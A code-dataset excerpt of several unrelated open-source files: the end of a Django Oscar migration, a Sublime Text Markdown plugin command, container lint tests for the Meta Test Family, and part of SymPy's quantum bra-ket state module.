'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'})
},
'offer.benefit': {
'Meta': {'object_name': 'Benefit'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_affected_items': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
'offer.condition': {
'Meta': {'object_name': 'Condition'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
'offer.conditionaloffer': {
'Meta': {'ordering': "['-priority']", 'object_name': 'ConditionalOffer'},
'benefit': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Benefit']"}),
'condition': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Condition']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'end_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_basket_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_discount': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'max_global_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_user_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'num_applications': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'num_orders': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'offer_type': ('django.db.models.fields.CharField', [], {'default': "'Site'", 'max_length': '128'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'redirect_url': ('oscar.models.fields.ExtendedURLField', [], {'max_length': '200', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'unique': 'True', 'null': 'True'}),
'start_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Open'", 'max_length': '64'}),
'total_discount': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'offer.range': {
'Meta': {'object_name': 'Range'},
'classes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'classes'", 'blank': 'True', 'to': "orm['catalogue.ProductClass']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'excluded_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'excludes'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'included_categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'to': "orm['catalogue.Category']"}),
'included_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'includes_all_products': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'promotions.automaticproductlist': {
'Meta': {'object_name': 'AutomaticProductList'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'link_url': ('oscar.models.fields.ExtendedURLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'method': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'num_products': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '4'})
},
'promotions.handpickedproductlist': {
'Meta': {'object_name': 'HandPickedProductList'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'link_url': ('oscar.models.fields.ExtendedURLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalogue.Product']", 'null': 'True', 'through': "orm['promotions.OrderedProduct']", 'blank': 'True'})
},
'promotions.keywordpromotion': {
'Meta': {'object_name': 'KeywordPromotion'},
'clicks': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'display_order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'filter': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keyword': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'promotions.orderedproduct': {
'Meta': {'ordering': "('display_order',)", 'object_name': 'OrderedProduct'},
'display_order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'list': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['promotions.HandPickedProductList']"}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'promotions.pagepromotion': {
'Meta': {'object_name': 'PagePromotion'},
'clicks': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'display_order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'page_url': ('oscar.models.fields.ExtendedURLField', [], {'max_length': '128', 'db_index': 'True'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['fancypages']
|
bsd-3-clause
| -8,242,269,794,335,194,000
| 77.575589
| 222
| 0.590172
| false
| 3.705232
| false
| false
| false
|
SublimeText-Markdown/MarkdownEditing
|
open_page.py
|
1
|
1363
|
import sublime, sublime_plugin
import os, string
import re
try:
from MarkdownEditing.wiki_page import *
except ImportError:
from wiki_page import *
try:
from MarkdownEditing.mdeutils import *
except ImportError:
from mdeutils import *
class OpenPageCommand(MDETextCommand):
def is_visible(self):
"""Return True if cursor is on a wiki page reference."""
for sel in self.view.sel():
scopes = self.view.scope_name(sel.b).split(" ")
if 'meta.link.wiki.markdown' in scopes:
return True
return False
def run(self, edit):
print("Running OpenPageCommand")
wiki_page = WikiPage(self.view)
sel_region = self.get_selected()
if sel_region:
wiki_page.select_word_at_cursor()
region = sublime.Region(sel_region.begin(), sel_region.begin())
file_list = wiki_page.find_matching_files(region)
if len(file_list) > 1:
wiki_page.show_quick_list(file_list)
else:
name = wiki_page.identify_page_at_cursor()
wiki_page.select_page(name)
def get_selected(self):
selection = self.view.sel()
for region in selection:
return region
return None
|
mit
| -2,559,636,679,433,864,700
| 24.211538
| 75
| 0.568599
| false
| 4.032544
| false
| false
| false
|
fedora-modularity/meta-test-family
|
moduleframework/tests/generic/dockerlint.py
|
1
|
6137
|
# -*- coding: utf-8 -*-
#
# Meta test family (MTF) is a tool to test components of a modular Fedora:
# https://docs.pagure.org/modularity/
# Copyright (C) 2017 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# he Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Authors: Jan Scotka <jscotka@redhat.com>
#
from moduleframework.avocado_testers import container_avocado_test
class DockerfileLinterInContainer(container_avocado_test.ContainerAvocadoTest):
"""
:avocado: enable
:avocado: tags=sanity,rhel,fedora,docker,docker_lint_inside_test,generic
"""
def _file_to_check(self, doc_file_list):
test_failed = False
for doc in doc_file_list:
exit_status = self.run("test -e %s" % doc, ignore_status=True).exit_status
if int(exit_status) == 0:
self.log.debug("%s doc file exists in container" % doc)
test_failed = True
return test_failed
def test_all_nodocs(self):
self.start()
all_docs = self.run("rpm -qad", verbose=False).stdout
test_failed = self._file_to_check(all_docs.split('\n'))
msg = "Documentation files exist in container. They are installed in the base image or by RUN commands."
if test_failed:
self.log.warn(msg)
self.assertTrue(True, msg=msg)
def test_installed_docs(self):
"""
This test checks whether no docs are installed by RUN dnf command
:return: FAILED in case we found some docs
PASS in case there is no doc file found
"""
self.start()
# Double brackets has to by used because of trans_dict.
# 'EXCEPTION MTF: ', 'Command is formatted by using trans_dict.
# If you want to use brackets { } in your code, please use {{ }}.
installed_pkgs = self.run("rpm -qa --qf '%{{NAME}}\n'", verbose=False).stdout
defined_pkgs = self.backend.getPackageList()
list_pkg = set(installed_pkgs).intersection(set(defined_pkgs))
test_failed = False
docu_pkg = []
for pkg in list_pkg:
pkg_doc = self.run("rpm -qd %s" % pkg, verbose=False).stdout
if self._file_to_check(pkg_doc.split('\n')):
docu_pkg.append(pkg)
test_failed = True
self.assertFalse(test_failed, msg="There is documentation installed for packages: %s" % ','.join(docu_pkg))
def _check_container_files(self, exts, pkg_mgr):
found_files = False
file_list = []
for ext in exts:
dir_with_ext = "/var/cache/{pkg_mgr}/**/*.{ext}".format(pkg_mgr=pkg_mgr, ext=ext)
# Some images does not contain find command and therefore we have to use for or ls.
ret = self.run('shopt -s globstar && for i in {dir}; do printf "%s\\n" "$i" ; done'.format(
dir=dir_with_ext),
ignore_status=True)
# we did not find any file with an extension.
# TODO I don't how to detect failure or empty files.
if ret.stdout.strip() == dir_with_ext:
continue
file_list.extend(ret.stdout.split('\n'))
if self._file_to_check(file_list):
found_files = True
return found_files
def _dnf_clean_all(self):
"""
Function checks if files with relevant extensions exist in /var/cache/dnf directory
:return: True if at least one file exists
False if no file exists
"""
exts = ["solv", "solvx", "xml.gz", "rpm"]
return self._check_container_files(exts, "dnf")
def _yum_clean_all(self):
"""
Function checks if files with relevant extensions exist in /var/cache/dnf directory
:return: True if at least one file exists
False if no file exists
"""
# extensions are taken from https://github.com/rpm-software-management/yum/blob/master/yum/__init__.py#L2854
exts = ['rpm', 'sqlite', 'sqlite.bz2', 'xml.gz', 'asc', 'mirrorlist.txt', 'cachecookie', 'xml']
return self._check_container_files(exts, "yum")
def test_docker_clean_all(self):
"""
This test checks if `dnf/yum clean all` was called in image
:return: return True if clean all is called
return False if clean all is not called
"""
self.start()
# Detect distro in image
distro = self.run("cat /etc/os-release").stdout
if 'Fedora' in distro:
self.assertFalse(self._dnf_clean_all(), msg="`dnf clean all` is not present in Dockerfile.")
else:
self.assertFalse(self._yum_clean_all(), msg="`yum clean all` is not present in Dockerfile.")
class DockerLint(container_avocado_test.ContainerAvocadoTest):
"""
:avocado: enable
:avocado: tags=sanity,rhel,fedora,docker,docker_labels_inspect_test
"""
def testLabels(self):
"""
Function tests whether labels are set in modulemd YAML file properly.
:return:
"""
llabels = self.getConfigModule().get('labels')
if llabels is None or len(llabels) == 0:
self.log.info("No labels defined in config to check")
self.cancel()
for key in self.getConfigModule()['labels']:
print(self.getConfigModule()['labels'][key])
aaa = self.checkLabel(key, self.getConfigModule()['labels'][key])
self.assertTrue(aaa, msg="Label %s is not set properly in modulemd YAML file." % key)
|
gpl-3.0
| 7,287,457,387,612,954,000
| 41.324138
| 116
| 0.617403
| false
| 3.850063
| true
| false
| false
|
amitjamadagni/sympy
|
sympy/physics/quantum/state.py
|
2
|
28699
|
"""Dirac notation for states."""
from sympy import (cacheit, conjugate, Expr, Function, integrate, oo, sqrt,
Tuple)
from sympy.printing.pretty.stringpict import prettyForm, stringPict
from sympy.physics.quantum.qexpr import QExpr, dispatch_method
__all__ = [
'KetBase',
'BraBase',
'StateBase',
'State',
'Ket',
'Bra',
'TimeDepState',
'TimeDepBra',
'TimeDepKet',
'Wavefunction'
]
#-----------------------------------------------------------------------------
# States, bras and kets.
#-----------------------------------------------------------------------------
# ASCII brackets
_lbracket = "<"
_rbracket = ">"
_straight_bracket = "|"
# Unicode brackets
# MATHEMATICAL ANGLE BRACKETS
_lbracket_ucode = u"\u27E8"
_rbracket_ucode = u"\u27E9"
# LIGHT VERTICAL BAR
_straight_bracket_ucode = u"\u2758"
# Other options for unicode printing of <, > and | for Dirac notation.
# LEFT-POINTING ANGLE BRACKET
# _lbracket = u"\u2329"
# _rbracket = u"\u232A"
# LEFT ANGLE BRACKET
# _lbracket = u"\u3008"
# _rbracket = u"\u3009"
# VERTICAL LINE
# _straight_bracket = u"\u007C"
class StateBase(QExpr):
"""Abstract base class for general abstract states in quantum mechanics.
All other state classes defined will need to inherit from this class. It
carries the basic structure for all other states such as dual, _eval_adjoint
and label.
This is an abstract base class and you should not instantiate it directly,
instead use State.
"""
@classmethod
def _operators_to_state(self, ops, **options):
""" Returns the eigenstate instance for the passed operators.
This method should be overridden in subclasses. It will handle being
passed either an Operator instance or set of Operator instances. It
should return the corresponding state INSTANCE or simply raise a
NotImplementedError. See cartesian.py for an example.
"""
raise NotImplementedError("Cannot map operators to states in this class. Method not implemented!")
def _state_to_operators(self, op_classes, **options):
""" Returns the operators which this state instance is an eigenstate
of.
This method should be overridden in subclasses. It will be called on
state instances and be passed the operator classes that we wish to make
into instances. The state instance will then transform the classes
appropriately, or raise a NotImplementedError if it cannot return
operator instances. See cartesian.py for examples,
"""
raise NotImplementedError(
"Cannot map this state to operators. Method not implemented!")
@property
def operators(self):
"""Return the operator(s) that this state is an eigenstate of"""
from operatorset import state_to_operators # import internally to avoid circular import errors
return state_to_operators(self)
def _enumerate_state(self, num_states, **options):
raise NotImplementedError("Cannot enumerate this state!")
def _represent_default_basis(self, **options):
return self._represent(basis=self.operators)
#-------------------------------------------------------------------------
# Dagger/dual
#-------------------------------------------------------------------------
@property
def dual(self):
"""Return the dual state of this one."""
return self.dual_class()._new_rawargs(self.hilbert_space, *self.args)
@classmethod
def dual_class(self):
"""Return the class used to construt the dual."""
raise NotImplementedError(
'dual_class must be implemented in a subclass'
)
def _eval_adjoint(self):
"""Compute the dagger of this state using the dual."""
return self.dual
#-------------------------------------------------------------------------
# Printing
#-------------------------------------------------------------------------
def _pretty_brackets(self, height, use_unicode=True):
# Return pretty printed brackets for the state
# Ideally, this could be done by pform.parens but it does not support the angled < and >
# Setup for unicode vs ascii
if use_unicode:
lbracket, rbracket = self.lbracket_ucode, self.rbracket_ucode
slash, bslash, vert = u'\u2571', u'\u2572', u'\u2502'
else:
lbracket, rbracket = self.lbracket, self.rbracket
slash, bslash, vert = '/', '\\', '|'
# If height is 1, just return brackets
if height == 1:
return stringPict(lbracket), stringPict(rbracket)
# Make height even
height += (height % 2)
brackets = []
for bracket in lbracket, rbracket:
# Create left bracket
if bracket in set([_lbracket, _lbracket_ucode]):
bracket_args = [ ' ' * (height//2 - i - 1) +
slash for i in range(height // 2)]
bracket_args.extend(
[ ' ' * i + bslash for i in range(height // 2)])
# Create right bracket
elif bracket in set([_rbracket, _rbracket_ucode]):
bracket_args = [ ' ' * i + bslash for i in range(height // 2)]
bracket_args.extend([ ' ' * (
height//2 - i - 1) + slash for i in range(height // 2)])
# Create straight bracket
elif bracket in set([_straight_bracket, _straight_bracket_ucode]):
bracket_args = [vert for i in range(height)]
else:
raise ValueError(bracket)
brackets.append(
stringPict('\n'.join(bracket_args), baseline=height//2))
return brackets
def _sympystr(self, printer, *args):
contents = self._print_contents(printer, *args)
return '%s%s%s' % (self.lbracket, contents, self.rbracket)
def _pretty(self, printer, *args):
from sympy.printing.pretty.stringpict import prettyForm
# Get brackets
pform = self._print_contents_pretty(printer, *args)
lbracket, rbracket = self._pretty_brackets(
pform.height(), printer._use_unicode)
# Put together state
pform = prettyForm(*pform.left(lbracket))
pform = prettyForm(*pform.right(rbracket))
return pform
def _latex(self, printer, *args):
contents = self._print_contents_latex(printer, *args)
# The extra {} brackets are needed to get matplotlib's latex
# rendered to render this properly.
return '{%s%s%s}' % (self.lbracket_latex, contents, self.rbracket_latex)
class KetBase(StateBase):
"""Base class for Kets.
This class defines the dual property and the brackets for printing. This is
an abstract base class and you should not instantiate it directly, instead
use Ket.
"""
lbracket = _straight_bracket
rbracket = _rbracket
lbracket_ucode = _straight_bracket_ucode
rbracket_ucode = _rbracket_ucode
lbracket_latex = r'\left|'
rbracket_latex = r'\right\rangle '
@classmethod
def default_args(self):
return ("psi",)
@classmethod
def dual_class(self):
return BraBase
def __mul__(self, other):
"""KetBase*other"""
from sympy.physics.quantum.operator import OuterProduct
if isinstance(other, BraBase):
return OuterProduct(self, other)
else:
return Expr.__mul__(self, other)
def __rmul__(self, other):
"""other*KetBase"""
from sympy.physics.quantum.innerproduct import InnerProduct
if isinstance(other, BraBase):
return InnerProduct(other, self)
else:
return Expr.__rmul__(self, other)
#-------------------------------------------------------------------------
# _eval_* methods
#-------------------------------------------------------------------------
def _eval_innerproduct(self, bra, **hints):
"""Evaluate the inner product betweeen this ket and a bra.
This is called to compute <bra|ket>, where the ket is ``self``.
This method will dispatch to sub-methods having the format::
``def _eval_innerproduct_BraClass(self, **hints):``
Subclasses should define these methods (one for each BraClass) to
teach the ket how to take inner products with bras.
"""
return dispatch_method(self, '_eval_innerproduct', bra, **hints)
def _apply_operator(self, op, **options):
"""Apply an Operator to this Ket.
This method will dispatch to methods having the format::
``def _apply_operator_OperatorName(op, **options):``
Subclasses should define these methods (one for each OperatorName) to
teach the Ket how operators act on it.
Parameters
==========
op : Operator
The Operator that is acting on the Ket.
options : dict
A dict of key/value pairs that control how the operator is applied
to the Ket.
"""
return dispatch_method(self, '_apply_operator', op, **options)
class BraBase(StateBase):
"""Base class for Bras.
This class defines the dual property and the brackets for printing. This
is an abstract base class and you should not instantiate it directly,
instead use Bra.
"""
lbracket = _lbracket
rbracket = _straight_bracket
lbracket_ucode = _lbracket_ucode
rbracket_ucode = _straight_bracket_ucode
lbracket_latex = r'\left\langle '
rbracket_latex = r'\right|'
@classmethod
def _operators_to_state(self, ops, **options):
state = self.dual_class().operators_to_state(ops, **options)
return state.dual
def _state_to_operators(self, op_classes, **options):
return self.dual._state_to_operators(op_classes, **options)
def _enumerate_state(self, num_states, **options):
dual_states = self.dual._enumerate_state(num_states, **options)
return map(lambda x: x.dual, dual_states)
@classmethod
def default_args(self):
return self.dual_class().default_args()
@classmethod
def dual_class(self):
return KetBase
def __mul__(self, other):
"""BraBase*other"""
from sympy.physics.quantum.innerproduct import InnerProduct
if isinstance(other, KetBase):
return InnerProduct(self, other)
else:
return Expr.__mul__(self, other)
def __rmul__(self, other):
"""other*BraBase"""
from sympy.physics.quantum.operator import OuterProduct
if isinstance(other, KetBase):
return OuterProduct(other, self)
else:
return Expr.__rmul__(self, other)
def _represent(self, **options):
"""A default represent that uses the Ket's version."""
from sympy.physics.quantum.dagger import Dagger
return Dagger(self.dual._represent(**options))
class State(StateBase):
"""General abstract quantum state used as a base class for Ket and Bra."""
pass
class Ket(State, KetBase):
"""A general time-independent Ket in quantum mechanics.
Inherits from State and KetBase. This class should be used as the base
class for all physical, time-independent Kets in a system. This class
and its subclasses will be the main classes that users will use for
expressing Kets in Dirac notation [1]_.
Parameters
==========
args : tuple
The list of numbers or parameters that uniquely specify the
ket. This will usually be its symbol or its quantum numbers. For
time-dependent state, this will include the time.
Examples
========
Create a simple Ket and looking at its properties::
>>> from sympy.physics.quantum import Ket, Bra
>>> from sympy import symbols, I
>>> k = Ket('psi')
>>> k
|psi>
>>> k.hilbert_space
H
>>> k.is_commutative
False
>>> k.label
(psi,)
Ket's know about their associated bra::
>>> k.dual
<psi|
>>> k.dual_class()
<class 'sympy.physics.quantum.state.Bra'>
Take a linear combination of two kets::
>>> k0 = Ket(0)
>>> k1 = Ket(1)
>>> 2*I*k0 - 4*k1
2*I*|0> - 4*|1>
Compound labels are passed as tuples::
>>> n, m = symbols('n,m')
>>> k = Ket(n,m)
>>> k
|nm>
References
==========
.. [1] http://en.wikipedia.org/wiki/Bra-ket_notation
"""
@classmethod
def dual_class(self):
return Bra
class Bra(State, BraBase):
"""A general time-independent Bra in quantum mechanics.
Inherits from State and BraBase. A Bra is the dual of a Ket [1]_. This
class and its subclasses will be the main classes that users will use for
expressing Bras in Dirac notation.
Parameters
==========
args : tuple
The list of numbers or parameters that uniquely specify the
ket. This will usually be its symbol or its quantum numbers. For
time-dependent state, this will include the time.
Examples
========
Create a simple Bra and look at its properties::
>>> from sympy.physics.quantum import Ket, Bra
>>> from sympy import symbols, I
>>> b = Bra('psi')
>>> b
<psi|
>>> b.hilbert_space
H
>>> b.is_commutative
False
Bra's know about their dual Ket's::
>>> b.dual
|psi>
>>> b.dual_class()
<class 'sympy.physics.quantum.state.Ket'>
Like Kets, Bras can have compound labels and be manipulated in a similar
manner::
>>> n, m = symbols('n,m')
>>> b = Bra(n,m) - I*Bra(m,n)
>>> b
-I*<mn| + <nm|
Symbols in a Bra can be substituted using ``.subs``::
>>> b.subs(n,m)
<mm| - I*<mm|
References
==========
.. [1] http://en.wikipedia.org/wiki/Bra-ket_notation
"""
@classmethod
def dual_class(self):
return Ket
#-----------------------------------------------------------------------------
# Time dependent states, bras and kets.
#-----------------------------------------------------------------------------
class TimeDepState(StateBase):
"""Base class for a general time-dependent quantum state.
This class is used as a base class for any time-dependent state. The main
difference between this class and the time-independent state is that this
class takes a second argument that is the time in addition to the usual
label argument.
Parameters
==========
args : tuple
The list of numbers or parameters that uniquely specify the ket. This
will usually be its symbol or its quantum numbers. For time-dependent
state, this will include the time as the final argument.
"""
#-------------------------------------------------------------------------
# Initialization
#-------------------------------------------------------------------------
@classmethod
def default_args(self):
return ("psi", "t")
#-------------------------------------------------------------------------
# Properties
#-------------------------------------------------------------------------
@property
def label(self):
"""The label of the state."""
return self.args[:-1]
@property
def time(self):
"""The time of the state."""
return self.args[-1]
#-------------------------------------------------------------------------
# Printing
#-------------------------------------------------------------------------
def _print_time(self, printer, *args):
return printer._print(self.time, *args)
_print_time_repr = _print_time
_print_time_latex = _print_time
def _print_time_pretty(self, printer, *args):
pform = printer._print(self.time, *args)
return pform
def _print_contents(self, printer, *args):
label = self._print_label(printer, *args)
time = self._print_time(printer, *args)
return '%s;%s' % (label, time)
def _print_label_repr(self, printer, *args):
label = self._print_sequence(self.label, ',', printer, *args)
time = self._print_time_repr(printer, *args)
return '%s,%s' % (label, time)
def _print_contents_pretty(self, printer, *args):
label = self._print_label_pretty(printer, *args)
time = self._print_time_pretty(printer, *args)
return printer._print_seq((label, time), delimiter=';')
def _print_contents_latex(self, printer, *args):
label = self._print_sequence(
self.label, self._label_separator, printer, *args)
time = self._print_time_latex(printer, *args)
return '%s;%s' % (label, time)
class TimeDepKet(TimeDepState, KetBase):
"""General time-dependent Ket in quantum mechanics.
This inherits from ``TimeDepState`` and ``KetBase`` and is the main class
that should be used for Kets that vary with time. Its dual is a
``TimeDepBra``.
Parameters
==========
args : tuple
The list of numbers or parameters that uniquely specify the ket. This
will usually be its symbol or its quantum numbers. For time-dependent
state, this will include the time as the final argument.
Examples
========
Create a TimeDepKet and look at its attributes::
>>> from sympy.physics.quantum import TimeDepKet
>>> k = TimeDepKet('psi', 't')
>>> k
|psi;t>
>>> k.time
t
>>> k.label
(psi,)
>>> k.hilbert_space
H
TimeDepKets know about their dual bra::
>>> k.dual
<psi;t|
>>> k.dual_class()
<class 'sympy.physics.quantum.state.TimeDepBra'>
"""
@classmethod
def dual_class(self):
return TimeDepBra
class TimeDepBra(TimeDepState, BraBase):
"""General time-dependent Bra in quantum mechanics.
This inherits from TimeDepState and BraBase and is the main class that
should be used for Bras that vary with time. Its dual is a TimeDepBra.
Parameters
==========
args : tuple
The list of numbers or parameters that uniquely specify the ket. This
will usually be its symbol or its quantum numbers. For time-dependent
state, this will include the time as the final argument.
Examples
========
>>> from sympy.physics.quantum import TimeDepBra
>>> from sympy import symbols, I
>>> b = TimeDepBra('psi', 't')
>>> b
<psi;t|
>>> b.time
t
>>> b.label
(psi,)
>>> b.hilbert_space
H
>>> b.dual
|psi;t>
"""
@classmethod
def dual_class(self):
return TimeDepKet
class Wavefunction(Function):
"""Class for representations in continuous bases
This class takes an expression and coordinates in its constructor. It can
be used to easily calculate normalizations and probabilities.
Parameters
==========
expr : Expr
The expression representing the functional form of the w.f.
coords : Symbol or tuple
The coordinates to be integrated over, and their bounds
Examples
========
Particle in a box, specifying bounds in the more primitive way of using
Piecewise:
>>> from sympy import Symbol, Piecewise, pi, N
>>> from sympy.functions import sqrt, sin
>>> from sympy.physics.quantum.state import Wavefunction
>>> x = Symbol('x', real=True)
>>> n = 1
>>> L = 1
>>> g = Piecewise((0, x < 0), (0, x > L), (sqrt(2//L)*sin(n*pi*x/L), True))
>>> f = Wavefunction(g, x)
>>> f.norm
1
>>> f.is_normalized
True
>>> p = f.prob()
>>> p(0)
0
>>> p(L)
0
>>> p(0.5)
2
>>> p(0.85*L)
2*sin(0.85*pi)**2
>>> N(p(0.85*L))
0.412214747707527
Additionally, you can specify the bounds of the function and the indices in
a more compact way:
>>> from sympy import symbols, pi, diff
>>> from sympy.functions import sqrt, sin
>>> from sympy.physics.quantum.state import Wavefunction
>>> x, L = symbols('x,L', positive=True)
>>> n = symbols('n', integer=True)
>>> g = sqrt(2/L)*sin(n*pi*x/L)
>>> f = Wavefunction(g, (x, 0, L))
>>> f.norm
1
>>> f(L+1)
0
>>> f(L-1)
sqrt(2)*sin(pi*n*(L - 1)/L)/sqrt(L)
>>> f(-1)
0
>>> f(0.85)
sqrt(2)*sin(0.85*pi*n/L)/sqrt(L)
>>> f(0.85, n=1, L=1)
sqrt(2)*sin(0.85*pi)
>>> f.is_commutative
False
All arguments are automatically sympified, so you can define the variables
as strings rather than symbols:
>>> expr = x**2
>>> f = Wavefunction(expr, 'x')
>>> type(f.variables[0])
<class 'sympy.core.symbol.Symbol'>
Derivatives of Wavefunctions will return Wavefunctions:
>>> diff(f, x)
Wavefunction(2*x, x)
"""
#Any passed tuples for coordinates and their bounds need to be
#converted to Tuples before Function's constructor is called, to
#avoid errors from calling is_Float in the constructor
def __new__(cls, *args, **options):
new_args = [None for i in args]
ct = 0
for arg in args:
if isinstance(arg, tuple):
new_args[ct] = Tuple(*arg)
else:
new_args[ct] = arg
ct += 1
return super(Function, cls).__new__(cls, *new_args, **options)
def __call__(self, *args, **options):
var = self.variables
if len(args) != len(var):
raise NotImplementedError(
"Incorrect number of arguments to function!")
ct = 0
#If the passed value is outside the specified bounds, return 0
for v in var:
lower, upper = self.limits[v]
#Do the comparison to limits only if the passed symbol is actually
#a symbol present in the limits;
#Had problems with a comparison of x > L
if isinstance(args[ct], Expr) and \
not (lower in args[ct].free_symbols
or upper in args[ct].free_symbols):
continue
if args[ct] < lower or args[ct] > upper:
return 0
ct += 1
expr = self.expr
#Allows user to make a call like f(2, 4, m=1, n=1)
for symbol in list(expr.free_symbols):
if str(symbol) in options.keys():
val = options[str(symbol)]
expr = expr.subs(symbol, val)
return expr.subs(zip(var, args))
def _eval_derivative(self, symbol):
expr = self.expr
deriv = expr._eval_derivative(symbol)
return Wavefunction(deriv, *self.args[1:])
def _eval_conjugate(self):
